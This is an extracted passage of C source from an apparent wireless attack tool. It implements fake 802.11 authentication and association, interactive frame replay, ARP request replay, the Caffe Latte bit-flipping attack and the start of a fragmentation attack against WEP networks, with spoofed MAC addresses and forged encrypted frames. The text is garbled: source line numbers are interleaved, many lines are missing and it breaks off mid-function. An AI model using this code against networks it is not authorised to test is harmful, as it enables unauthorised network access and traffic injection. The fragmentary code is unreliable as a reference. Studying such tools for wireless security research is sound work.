for( i = 0; i < x_send; i++ )
if(keystreamlen < challengelen+4)
packets=(challengelen)/(keystreamlen-4);
if( (challengelen)%(keystreamlen-4) != 0 )
memcpy(h80211+24, challenge, challengelen);
send_fragments(h80211, challengelen+24, iv, keystream, keystreamlen-4, 1);
add_icv(h80211, challengelen+28, 28);
xor_keystream(h80211+28, keystream, challengelen+4);
send_packet(h80211, 24+4+challengelen+4);
if( send_packet( ackbuf, 14 ) < 0 )
if( send_packet( ackbuf, 14 ) < 0 )
/* waiting for an authentication response (using ska) */
if( time( NULL ) - tt >= 2 )
if(opt.npackets > 0)
"\nAttack was unsuccessful. Possible reasons:\n\n"
" * Perhaps MAC address filtering is enabled.\n"
" * Check that the BSSID (-a option) is correct.\n"
" * Try to change the number of packets (-o option).\n"
" * The driver/card doesn't support injection.\n"
" * This attack sometimes fails against some APs.\n"
" * The card is not on the same channel as the AP.\n"
" * You're too far from the AP. Get closer, or lower\n"
" the transmit rate.\n\n" );
if(opt.npackets == -1) x_send *= 2;
/* attempt to associate */
memcpy( h80211, ASSOC_REQ, 28 );
memcpy( h80211 + 4, opt.r_bssid, 6 );
memcpy( h80211 + 10, opt.r_smac , 6 );
memcpy( h80211 + 16, opt.r_bssid, 6 );
n = strlen( opt.r_essid );
if( n > 32 ) n = 32;
memcpy( h80211 + 30, opt.r_essid, n );
memcpy( h80211 + 30 + n, RATES, 16 );
memcpy( h80211 + 24, capa, 2);
PCT; printf( "Sending Association Request" );
for( i = 0; i < x_send; i++ )
if( send_packet( h80211, 46 + n ) < 0 )
if( send_packet( ackbuf, 14 ) < 0 )
if( send_packet( ackbuf, 14 ) < 0 )
/* waiting for an association response */
if( time( NULL ) - tt >= 5 )
if( x_send < 256 && (opt.npackets == -1) )
if( opt.a_delay == 0 )
if( time( NULL ) - tt >= opt.a_delay )
if(opt.npackets == -1) x_send = 4;
if( time( NULL ) - tr >= opt.delay )
PCT; printf( "Sending keep-alive packet" );
memcpy( h80211, NULL_DATA, 24 );
memcpy( h80211 + 4, opt.r_bssid, 6 );
memcpy( h80211 + 10, opt.r_smac, 6 );
memcpy( h80211 + 16, opt.r_bssid, 6 );
if( opt.npackets > 0 ) kas = opt.npackets;
for( i = 0; i < kas; i++ )
if( send_packet( h80211, 24 ) < 0 )
/* read one frame */
FD_SET( dev.fd_in, &rfds );
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
if( errno == EINTR ) continue;
perror( "select failed" );
if( ! FD_ISSET( dev.fd_in, &rfds ) )
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
if( caplen < 0 ) return( 1 );
if( caplen == 0 ) continue;
if( caplen == 10 && h80211[0] == 0xD4)
if( memcmp(h80211+4, opt.r_smac, 6) == 0 )
gettimeofday(&tv3, NULL);
//wait 100ms for acks
1846
if ( (((tv3.tv_sec*1000000 - tv2.tv_sec*1000000) + (tv3.tv_usec - tv2.tv_usec)) > (100*1000)) &&
1847
(gotack > 0) && (gotack < packets) && (state == 3) && (packets > 1) )
1849
PCT; printf("Not enough acks, repeating...\n");
1857
switch( h80211[1] & 3 )
1859
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
1860
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
1861
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
1862
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
1865
/* check if the dest. MAC is ours and source == AP */
1867
if( memcmp( h80211 + mi_d, opt.r_smac, 6 ) == 0 &&
1868
memcmp( h80211 + mi_b, opt.r_bssid, 6 ) == 0 &&
1869
memcmp( h80211 + mi_s, opt.r_bssid, 6 ) == 0 )
1871
/* check if we got a deauthentication packet */
1873
if( h80211[0] == 0xC0 ) //removed && state == 4
1876
PCT; printf( "Got a deauthentication packet! (Waiting %d seconds)\n", deauth_wait );
1877
if(opt.npackets == -1) x_send = 4;
1880
read_sleep( deauth_wait * 1000000 );
1885
/* check if we got a disassociation packet */
1887
if( h80211[0] == 0xA0 && state == 6 )
1890
PCT; printf( "Got a disassociation packet! (Waiting %d seconds)\n", deauth_wait );
1891
if(opt.npackets == -1) x_send = 4;
1894
read_sleep( deauth_wait );
1899
/* check if we got an authentication response */
1901
if( h80211[0] == 0xB0 && (state == 1 || state == 3) )
1905
if( (state==1 && h80211[26] != 0x02) || (state==3 && h80211[26] != 0x04) )
1916
printf( "Error: packet length < 30 bytes\n" );
1917
read_sleep( 3*1000000 );
1922
if( (h80211[24] != 0 || h80211[25] != 0) && ska==0)
1925
printf("Switching to shared key authentication\n");
1926
read_sleep(2*1000000); //read sleep 2s
1931
n = h80211[28] + ( h80211[29] << 8 );
1938
printf( "AP rejects the source MAC address (%02X:%02X:%02X:%02X:%02X:%02X) ?\n",
1939
opt.r_smac[0], opt.r_smac[1], opt.r_smac[2],
1940
opt.r_smac[3], opt.r_smac[4], opt.r_smac[5] );
1944
printf( "AP rejects our capabilities\n" );
1950
if(h80211[26] == 0x02)
1951
printf("Switching to shared key authentication\n");
1952
if(h80211[26] == 0x04)
1954
printf("Challenge failure\n");
1957
read_sleep(2*1000000); //read sleep 2s
1964
printf( "Authentication failed (code %d)\n", n );
1965
if(opt.npackets == -1) x_send = 4;
1966
read_sleep( 3*1000000 );
1971
if(ska && h80211[26]==0x02 && challengelen == 0)
1973
memcpy(challenge, h80211+24, caplen-24);
1974
challengelen=caplen-24;
1978
if(h80211[26]==0x02)
1980
state = 2; /* grab challenge */
1981
printf( "Authentication 1/2 successful\n" );
1983
if(h80211[26]==0x04)
1986
printf( "Authentication 2/2 successful\n" );
1991
printf( "Authentication successful\n" );
1992
state = 4; /* auth. done */
1996
/* check if we got an association response */
1998
if( h80211[0] == 0x10 && state == 5 )
2005
printf( "Error: packet length < 30 bytes\n" );
2011
n = h80211[26] + ( h80211[27] << 8 );
2018
printf( "Denied (code 1), is WPA in use ?\n" );
2022
printf( "Denied (code 10), open (no WEP) ?\n" );
2026
printf( "Denied (code 12), wrong ESSID or WPA ?\n" );
2030
printf( "Association denied (code %d)\n", n );
2039
aid=( ( (h80211[29] << 8) || (h80211[28]) ) & 0x3FFF);
2040
printf( "Association successful :-) (AID: %d)\n", aid );
2047
state = 6; /* assoc. done */
2055
int do_attack_interactive( void )
2058
int mi_b, mi_s, mi_d;
2062
unsigned char bssid[6];
2063
unsigned char smac[6];
2064
unsigned char dmac[6];
2068
if( capture_ask_packet( &caplen, 0 ) != 0 )
2071
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2072
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2075
/* rewrite the frame control & MAC addresses */
2077
switch( h80211[1] & 3 )
2079
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
2080
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
2081
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
2082
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
2085
if( memcmp( opt.r_bssid, NULL_MAC, 6 ) == 0 )
2086
memcpy( bssid, h80211 + mi_b, 6 );
2088
memcpy( bssid, opt.r_bssid, 6 );
2090
if( memcmp( opt.r_smac , NULL_MAC, 6 ) == 0 )
2091
memcpy( smac, h80211 + mi_s, 6 );
2093
memcpy( smac, opt.r_smac, 6 );
2095
if( memcmp( opt.r_dmac , NULL_MAC, 6 ) == 0 )
2096
memcpy( dmac, h80211 + mi_d, 6 );
2098
memcpy( dmac, opt.r_dmac, 6 );
2100
if( opt.r_fctrl != -1 )
2102
h80211[0] = opt.r_fctrl >> 8;
2103
h80211[1] = opt.r_fctrl & 0xFF;
2105
switch( h80211[1] & 3 )
2107
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
2108
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
2109
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
2110
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
2114
memcpy( h80211 + mi_b, bssid, 6 );
2115
memcpy( h80211 + mi_s, smac , 6 );
2116
memcpy( h80211 + mi_d, dmac , 6 );
2118
/* loop resending the packet */
2120
/* TODO: actually check whether airodump-ng is running; for now the reminder below is printed unconditionally */
2121
printf( "You should also start airodump-ng to capture replies.\n\n" );
2123
signal( SIGINT, sighandler );
2126
memset( ticks, 0, sizeof( ticks ) );
2135
/* wait for the next timer interrupt, or sleep */
2137
if( dev.fd_rtc >= 0 )
2139
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2141
perror( "read(/dev/rtc) failed" );
2151
/* we can't trust usleep, since it depends on the HZ */
2153
gettimeofday( &tv, NULL );
2154
usleep( 1000000/RTC_RESOLUTION );
2155
gettimeofday( &tv2, NULL );
2157
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2158
+ (float) ( tv2.tv_usec - tv.tv_usec );
2160
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2161
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2162
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2165
/* update the status line */
2167
if( ticks[1] > (RTC_RESOLUTION/10) )
2170
printf( "\rSent %ld packets...(%d pps)\33[K\r", nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)));
2174
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION < 1 )
2177
/* threshold reached */
2181
if( nb_pkt_sent == 0 )
2184
if( send_packet( h80211, caplen ) < 0 )
2187
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2189
if( send_packet( h80211, caplen ) < 0 )
2197
int do_attack_arp_resend( void )
2200
int arp_off1, arp_off2;
2201
int i, n, caplen, nb_arp, z;
2202
long nb_pkt_read, nb_arp_tot, nb_ack_pkt;
2211
struct pcap_file_header pfh_out;
2212
struct pcap_pkthdr pkh;
2213
struct ARP_req * arp;
2215
if ( opt.ringbuffer )
2216
arp = (struct ARP_req*) malloc( opt.ringbuffer * sizeof( struct ARP_req ) );
2218
arp = (struct ARP_req*) malloc( sizeof( struct ARP_req ) );
2220
/* capture only WEP data to broadcast address */
2226
memset( opt.f_dmac, 0xFF, 6 );
2228
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
2230
printf( "Please specify a source MAC (-h).\n" );
2234
if(getnet(NULL, 1, 1) != 0)
2237
/* create and write the output pcap header */
2239
gettimeofday( &tv, NULL );
2241
pfh_out.magic = TCPDUMP_MAGIC;
2242
pfh_out.version_major = PCAP_VERSION_MAJOR;
2243
pfh_out.version_minor = PCAP_VERSION_MINOR;
2244
pfh_out.thiszone = 0;
2245
pfh_out.sigfigs = 0;
2246
pfh_out.snaplen = 65535;
2247
pfh_out.linktype = LINKTYPE_IEEE802_11;
2249
lt = localtime( (const time_t *) &tv.tv_sec );
2251
memset( strbuf, 0, sizeof( strbuf ) );
2252
snprintf( strbuf, sizeof( strbuf ) - 1,
2253
"replay_arp-%02d%02d-%02d%02d%02d.cap",
2254
lt->tm_mon + 1, lt->tm_mday,
2255
lt->tm_hour, lt->tm_min, lt->tm_sec );
2257
printf( "Saving ARP requests in %s\n", strbuf );
2259
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
2261
perror( "fopen failed" );
2265
n = sizeof( struct pcap_file_header );
2267
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
2269
perror( "fwrite failed\n" );
2273
fflush( f_cap_out );
2275
printf( "You should also start airodump-ng to capture replies.\n" );
2277
if(opt.port_in <= 0)
2279
/* avoid blocking on reading the socket */
2280
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
2282
perror( "fcntl(O_NONBLOCK) failed" );
2287
memset( ticks, 0, sizeof( ticks ) );
2289
tc = time( NULL ) - 11;
2301
/* sleep until the next clock tick */
2303
if( dev.fd_rtc >= 0 )
2305
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2307
perror( "read(/dev/rtc) failed" );
2317
gettimeofday( &tv, NULL );
2318
usleep( 1000000/RTC_RESOLUTION );
2319
gettimeofday( &tv2, NULL );
2321
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2322
+ (float) ( tv2.tv_usec - tv.tv_usec );
2324
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2325
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2326
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2329
if( ticks[1] > (RTC_RESOLUTION/10) )
2332
printf( "\rRead %ld packets (got %ld ARP requests and %ld ACKs), "
2333
"sent %ld packets...(%d pps)\r",
2334
nb_pkt_read, nb_arp_tot, nb_ack_pkt, nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)) );
2338
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
2340
/* threshold reached, send one frame */
2346
if( nb_pkt_sent == 0 )
2349
if( send_packet( arp[arp_off1].buf,
2350
arp[arp_off1].len ) < 0 )
2353
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2355
if( send_packet( arp[arp_off1].buf,
2356
arp[arp_off1].len ) < 0 )
2360
if( ++arp_off1 >= nb_arp )
2365
/* read a frame, and check if it's an ARP request */
2367
if( opt.s_file == NULL )
2369
gettimeofday( &tv, NULL );
2371
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
2373
if( caplen < 0 ) return( 1 );
2374
if( caplen == 0 ) continue;
2380
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
2386
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
2387
SWAP32( pkh.caplen );
2389
tv.tv_sec = pkh.tv_sec;
2390
tv.tv_usec = pkh.tv_usec;
2392
n = caplen = pkh.caplen;
2394
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
2396
printf( "\r\33[KInvalid packet length %d.\n", n );
2401
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
2407
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
2409
/* remove the prism header */
2411
if( h80211[7] == 0x40 )
2414
n = *(int *)( h80211 + 4 );
2416
if( n < 8 || n >= (int) caplen )
2419
memcpy( tmpbuf, h80211, caplen );
2421
memcpy( h80211, tmpbuf + n, caplen );
2424
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
2426
/* remove the radiotap header */
2428
n = *(unsigned short *)( h80211 + 2 );
2430
if( n <= 0 || n >= (int) caplen )
2433
memcpy( tmpbuf, h80211, caplen );
2435
memcpy( h80211, tmpbuf + n, caplen );
2438
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
2440
/* remove the PPI header */
2442
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
2444
if( n <= 0 || n>= (int) caplen )
2447
/* for a while Kismet logged broken PPI headers */
2448
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
2451
if( n <= 0 || n>= (int) caplen )
2454
memcpy( tmpbuf, h80211, caplen );
2456
memcpy( h80211, tmpbuf + n, caplen );
2462
/* check if it's a disas. or deauth packet */
2464
if( ( h80211[0] == 0xC0 || h80211[0] == 0xA0 ) &&
2465
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2469
if( nb_bad_pkt > 64 && time( NULL ) - tc >= 10 )
2471
printf( "\33[KNotice: got a deauth/disassoc packet. Is the "
2472
"source MAC associated ?\n" );
2479
if( h80211[0] == 0xD4 &&
2480
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2485
/* check if it's a potential ARP request */
2487
opt.f_minlen = opt.f_maxlen = 68;
2489
if( filter_packet( h80211, caplen ) == 0 )
2492
opt.f_minlen = opt.f_maxlen = 86;
2494
if( filter_packet( h80211, caplen ) == 0 )
2497
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2498
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2501
switch( h80211[1] & 3 )
2505
/* keep as a ToDS packet */
2507
memcpy( h80211 + 4, opt.f_bssid, 6 );
2508
memcpy( h80211 + 10, opt.r_smac, 6 );
2509
memcpy( h80211 + 16, opt.f_dmac, 6 );
2511
h80211[1] = 0x41; /* ToDS & WEP */
2513
case 2: /* FromDS */
2515
if( opt.r_fromdsinj )
2517
/* keep as a FromDS packet */
2519
memcpy( h80211 + 4, opt.f_dmac, 6 );
2520
memcpy( h80211 + 10, opt.f_bssid, 6 );
2521
memcpy( h80211 + 16, opt.r_smac, 6 );
2523
h80211[1] = 0x42; /* FromDS & WEP */
2527
/* rewrite header to make it a ToDS packet */
2529
memcpy( h80211 + 4, opt.f_bssid, 6 );
2530
memcpy( h80211 + 10, opt.r_smac, 6 );
2531
memcpy( h80211 + 16, opt.f_dmac, 6 );
2533
h80211[1] = 0x41; /* ToDS & WEP */
2538
//should be correct already, keep qos/wds status
2539
// h80211[0] = 0x08; /* normal data */
2541
/* if same IV, perhaps our own packet, skip it */
2543
for( i = 0; i < nb_arp; i++ )
2545
if( memcmp( h80211 + z, arp[i].buf + arp[i].hdrlen, 4 ) == 0 )
2554
/* add the ARP request in the ring buffer */
2558
/* Ring buffer size (default: 8) */
2560
if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
2562
/* no more room, overwrite oldest entry */
2564
memcpy( arp[arp_off2].buf, h80211, caplen );
2565
arp[arp_off2].len = caplen;
2566
arp[arp_off2].hdrlen = z;
2568
if( ++arp_off2 >= nb_arp )
2572
if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
2573
perror( "malloc failed" );
2577
memcpy( arp[nb_arp].buf, h80211, caplen );
2578
arp[nb_arp].len = caplen;
2579
arp[nb_arp].hdrlen = z;
2582
pkh.tv_sec = tv.tv_sec;
2583
pkh.tv_usec = tv.tv_usec;
2584
pkh.caplen = caplen;
2589
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) {
2590
perror( "fwrite failed" );
2596
if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
2597
perror( "fwrite failed" );
2601
fflush( f_cap_out );
2609
int do_attack_caffe_latte( void )
2612
int arp_off1, arp_off2;
2613
int i, n, caplen, nb_arp, z;
2614
long nb_pkt_read, nb_arp_tot, nb_ack_pkt;
2624
struct pcap_file_header pfh_out;
2625
struct pcap_pkthdr pkh;
2626
struct ARP_req * arp;
2628
if ( opt.ringbuffer )
2629
arp = (struct ARP_req*) malloc( opt.ringbuffer * sizeof( struct ARP_req ) );
2631
arp = (struct ARP_req*) malloc( sizeof( struct ARP_req ) );
2633
/* capture only WEP data to broadcast address */
2640
if(getnet(NULL, 1, 1) != 0)
2643
if( memcmp( opt.f_bssid, NULL_MAC, 6 ) == 0 )
2645
printf( "Please specify a BSSID (-b).\n" );
2648
/* create and write the output pcap header */
2650
gettimeofday( &tv, NULL );
2652
pfh_out.magic = TCPDUMP_MAGIC;
2653
pfh_out.version_major = PCAP_VERSION_MAJOR;
2654
pfh_out.version_minor = PCAP_VERSION_MINOR;
2655
pfh_out.thiszone = 0;
2656
pfh_out.sigfigs = 0;
2657
pfh_out.snaplen = 65535;
2658
pfh_out.linktype = LINKTYPE_IEEE802_11;
2660
lt = localtime( (const time_t *) &tv.tv_sec );
2662
memset( strbuf, 0, sizeof( strbuf ) );
2663
snprintf( strbuf, sizeof( strbuf ) - 1,
2664
"replay_arp-%02d%02d-%02d%02d%02d.cap",
2665
lt->tm_mon + 1, lt->tm_mday,
2666
lt->tm_hour, lt->tm_min, lt->tm_sec );
2668
printf( "Saving ARP requests in %s\n", strbuf );
2670
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
2672
perror( "fopen failed" );
2676
n = sizeof( struct pcap_file_header );
2678
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
2680
perror( "fwrite failed\n" );
2684
fflush( f_cap_out );
2686
printf( "You should also start airodump-ng to capture replies.\n" );
2688
if(opt.port_in <= 0)
2690
/* avoid blocking on reading the socket */
2691
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
2693
perror( "fcntl(O_NONBLOCK) failed" );
2698
memset( ticks, 0, sizeof( ticks ) );
2700
tc = time( NULL ) - 11;
2712
/* sleep until the next clock tick */
2714
if( dev.fd_rtc >= 0 )
2716
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2718
perror( "read(/dev/rtc) failed" );
2728
gettimeofday( &tv, NULL );
2729
usleep( 1000000/RTC_RESOLUTION );
2730
gettimeofday( &tv2, NULL );
2732
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2733
+ (float) ( tv2.tv_usec - tv.tv_usec );
2735
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2736
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2737
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2740
if( ticks[1] > (RTC_RESOLUTION/10) )
2743
printf( "\rRead %ld packets (%ld ARPs, %ld ACKs), "
2744
"sent %ld packets...(%d pps)\r",
2745
nb_pkt_read, nb_arp_tot, nb_ack_pkt, nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)) );
2749
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
2751
/* threshold reached, send one frame */
2757
if( nb_pkt_sent == 0 )
2760
if( send_packet( arp[arp_off1].buf,
2761
arp[arp_off1].len ) < 0 )
2764
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2766
if( send_packet( arp[arp_off1].buf,
2767
arp[arp_off1].len ) < 0 )
2771
if( ++arp_off1 >= nb_arp )
2776
/* read a frame, and check if it's an ARP request */
2778
if( opt.s_file == NULL )
2780
gettimeofday( &tv, NULL );
2782
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
2784
if( caplen < 0 ) return( 1 );
2785
if( caplen == 0 ) continue;
2791
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
2797
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
2798
SWAP32( pkh.caplen );
2800
tv.tv_sec = pkh.tv_sec;
2801
tv.tv_usec = pkh.tv_usec;
2803
n = caplen = pkh.caplen;
2805
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
2807
printf( "\r\33[KInvalid packet length %d.\n", n );
2812
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
2818
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
2820
/* remove the prism header */
2822
if( h80211[7] == 0x40 )
2825
n = *(int *)( h80211 + 4 );
2827
if( n < 8 || n >= (int) caplen )
2830
memcpy( tmpbuf, h80211, caplen );
2832
memcpy( h80211, tmpbuf + n, caplen );
2835
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
2837
/* remove the radiotap header */
2839
n = *(unsigned short *)( h80211 + 2 );
2841
if( n <= 0 || n >= (int) caplen )
2844
memcpy( tmpbuf, h80211, caplen );
2846
memcpy( h80211, tmpbuf + n, caplen );
2849
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
2851
/* remove the PPI header */
2853
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
2855
if( n <= 0 || n>= (int) caplen )
2858
/* for a while Kismet logged broken PPI headers */
2859
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
2862
if( n <= 0 || n>= (int) caplen )
2865
memcpy( tmpbuf, h80211, caplen );
2867
memcpy( h80211, tmpbuf + n, caplen );
2873
/* check if it's a disas. or deauth packet */
2875
if( ( h80211[0] == 0xC0 || h80211[0] == 0xA0 ) &&
2876
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2880
if( nb_bad_pkt > 64 && time( NULL ) - tc >= 10 )
2882
printf( "\33[KNotice: got a deauth/disassoc packet. Is the "
2883
"source MAC associated ?\n" );
2890
if( h80211[0] == 0xD4 &&
2891
! memcmp( h80211 + 4, opt.f_bssid, 6 ) )
2896
/* check if it's a potential ARP request */
2898
opt.f_minlen = opt.f_maxlen = 68;
2900
if( filter_packet( h80211, caplen ) == 0 )
2903
opt.f_minlen = opt.f_maxlen = 86;
2905
if( filter_packet( h80211, caplen ) == 0 )
2908
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2909
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2912
switch( h80211[1] & 3 )
2914
case 0: /* ad-hoc */
2916
if(memcmp(h80211 + 16, BROADCAST, 6) == 0)
2918
/* rewrite to an ad-hoc packet */
2920
memcpy( h80211 + 4, BROADCAST, 6 );
2921
memcpy( h80211 + 10, opt.r_smac, 6 );
2922
memcpy( h80211 + 16, opt.f_bssid, 6 );
2924
h80211[1] = 0x40; /* WEP */
2936
if(memcmp(h80211 + 16, BROADCAST, 6) == 0)
2938
/* rewrite to a FromDS packet */
2940
memcpy( h80211 + 4, BROADCAST, 6 );
2941
memcpy( h80211 + 10, opt.f_bssid, 6 );
2942
memcpy( h80211 + 16, opt.f_bssid, 6 );
2944
h80211[1] = 0x42; /* FromDS & WEP */
2958
// h80211[0] = 0x08; /* normal data */
2960
/* if same IV, perhaps our own packet, skip it */
2962
for( i = 0; i < nb_arp; i++ )
2964
if( memcmp( h80211 + z, arp[i].buf + arp[i].hdrlen, 4 ) == 0 )
2973
/* add the ARP request in the ring buffer */
2977
/* Ring buffer size (default: 8) */
2979
if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
2983
if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
2984
perror( "malloc failed" );
2988
memset(flip, 0, 4096);
2990
// flip[49-24-4] ^= ((rand() % 255)+1); //flip random bits in last byte of sender MAC
2991
// flip[53-24-4] ^= ((rand() % 255)+1); //flip random bits in last byte of sender IP
2992
flip[z+21] ^= ((rand() % 255)+1); //flip random bits in last byte of sender MAC
2993
flip[z+25] ^= ((rand() % 255)+1); //flip random bits in last byte of sender IP
2995
add_crc32_plain(flip, caplen-z-4-4);
2996
for(i=0; i<caplen-z-4; i++)
2997
(h80211+z+4)[i] ^= flip[i];
2999
memcpy( arp[nb_arp].buf, h80211, caplen );
3000
arp[nb_arp].len = caplen;
3001
arp[nb_arp].hdrlen = z;
3004
pkh.tv_sec = tv.tv_sec;
3005
pkh.tv_usec = tv.tv_usec;
3006
pkh.caplen = caplen;
3011
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) {
3012
perror( "fwrite failed" );
3018
if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
3019
perror( "fwrite failed" );
3023
fflush( f_cap_out );
3031
int set_clear_arp(uchar *buf, uchar *smac, uchar *dmac) //set first 22 bytes
3036
memcpy(buf, S_LLC_SNAP_ARP, 8);
3038
buf[9] = 0x01; //ethernet
3039
buf[10] = 0x08; // IP
3041
buf[12] = 0x06; //hardware size
3042
buf[13] = 0x04; //protocol size
3044
if(memcmp(dmac, BROADCAST, 6) == 0)
3045
buf[15] = 0x01; //request
3047
buf[15] = 0x02; //reply
3048
memcpy(buf+16, smac, 6);
3053
int set_final_arp(uchar *buf, uchar *mymac)
3058
//shifted by 10bytes to set source IP as target IP :)
3060
buf[0] = 0x08; // IP
3062
buf[2] = 0x06; //hardware size
3063
buf[3] = 0x04; //protocol size
3065
buf[5] = 0x01; //request
3066
memcpy(buf+6, mymac, 6); //sender mac
3067
buf[12] = 0xA9; //sender IP 169.254.87.197
3070
buf[15] = 0xC5; //end sender IP
3075
int set_clear_ip(uchar *buf, int ip_len) //set first 9 bytes
3080
memcpy(buf, S_LLC_SNAP_IP, 8);
3082
buf[10] = (ip_len >> 8) & 0xFF;
3083
buf[11] = ip_len & 0xFF;
3088
int set_final_ip(uchar *buf, uchar *mymac)
3093
//shifted by 12 bytes (three 4-byte fragments are prepended in the IP path, not one 10-byte fragment) to set source IP as target IP :)
3095
buf[0] = 0x06; //hardware size
3096
buf[1] = 0x04; //protocol size
3098
buf[3] = 0x01; //request
3099
memcpy(buf+4, mymac, 6); //sender mac
3100
buf[10] = 0xA9; //sender IP from 169.254.XXX.XXX
3106
int do_attack_cfrag( void )
3112
unsigned char bssid[6];
3113
unsigned char smac[6];
3114
unsigned char dmac[6];
3115
uchar keystream[128];
3116
uchar frag1[128], frag2[128], frag3[128];
3117
uchar clear[4096], final[4096], flip[4096];
3125
if( capture_ask_packet( &caplen, 0 ) != 0 )
3128
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3129
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3142
switch( h80211[1] & 3 )
3145
memcpy( bssid, h80211 + 16, 6 );
3146
memcpy( dmac, h80211 + 4, 6 );
3147
memcpy( smac, h80211 + 10, 6 );
3150
memcpy( bssid, h80211 + 4, 6 );
3151
memcpy( dmac, h80211 + 16, 6 );
3152
memcpy( smac, h80211 + 10, 6 );
3155
memcpy( bssid, h80211 + 10, 6 );
3156
memcpy( dmac, h80211 + 4, 6 );
3157
memcpy( smac, h80211 + 16, 6 );
3160
memcpy( bssid, h80211 + 10, 6 );
3161
memcpy( dmac, h80211 + 16, 6 );
3162
memcpy( smac, h80211 + 24, 6 );
3166
memset(clear, 0, 4096);
3167
memset(final, 0, 4096);
3168
memset(flip, 0, 4096);
3169
memset(frag1, 0, 128);
3170
memset(frag2, 0, 128);
3171
memset(frag3, 0, 128);
3172
memset(keystream, 0, 128);
3174
/* check if it's a potential ARP request */
3176
//its length must be 68-24 or 86-24 and the destination must be broadcast or a unicast MAC (I/G bit clear, i.e. even first byte)
3177
